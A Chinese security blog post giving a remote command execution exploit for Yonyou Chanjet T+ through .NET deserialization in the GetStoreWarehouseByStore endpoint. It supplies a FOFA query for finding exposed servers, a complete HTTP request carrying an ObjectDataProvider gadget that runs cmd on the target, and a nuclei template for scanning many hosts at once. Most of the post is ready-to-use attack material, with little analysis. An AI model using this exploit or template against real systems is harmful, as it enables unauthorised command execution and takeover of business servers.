用友畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞

漏洞简介

用友 畅捷通T+ GetStoreWarehouseByStore 存在 .net反序列化漏洞,导致远程命令执行,控制服务器

漏洞复现

fofa语法:app="畅捷通-TPlus"
登录页面如下:

POC:

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
X-Ajaxpro-Method: GetStoreWarehouseByStore
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-type: application/x-www-form-urlencoded
Content-Length: 577

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
        "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName":"cmd", "Arguments":"/c whoami > test.txt"
        }
    }
  }
}


访问/tplus/test.txt文件,查看命令执行结果

nuclei批量yaml文件

id: changjietong_GetStoreWarehouseByStore_rce
info:
  name: 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞
  author: mhb17
  severity: critical
  description: 
variables:
  file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
requests:
  - raw:
      - |-
        POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
        X-Ajaxpro-Method: GetStoreWarehouseByStore
        Host: {{Hostname}}
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Connection: close
        Content-type: application/x-www-form-urlencoded
        Content-Length: 577

        {
          "storeID":{
            "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
            "MethodName":"Start",
            "ObjectInstance":{
                "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "StartInfo": {
                    "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                    "FileName":"cmd", "Arguments":"/c whoami > {{file_name}}"
                }
            }
          }
        }
      - |+
        GET /tplus/{{file_name}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

    req-condition: true
    matchers:
      - type: dsl
        condition: and
        dsl:
          - 'contains((body_1), "System.ArgumentException") && status_code_2 == 200'
posted @   学安全的小白  阅读(1445)  评论(0编辑  收藏  举报
相关博文:
· 用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
· 用友畅捷通T+ 前台SQL注入漏洞复现(QVD-2023-13612)
· 畅捷通T+ GetStoreWarehouseByStore 反序列化分析
· 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
· 用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞
阅读排行:
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效
历史上的今天:
2021-09-15 RCE篇之命令执行中的各种绕过
2021-09-15 web安全——命令执行与代码执行
2021-09-15 PHP之十六个魔法函数详解
2021-09-15 web安全——php反序列化
2021-09-15 web安全——XXE
2021-09-15 web安全——SSRF
点击右上角即可分享
微信分享提示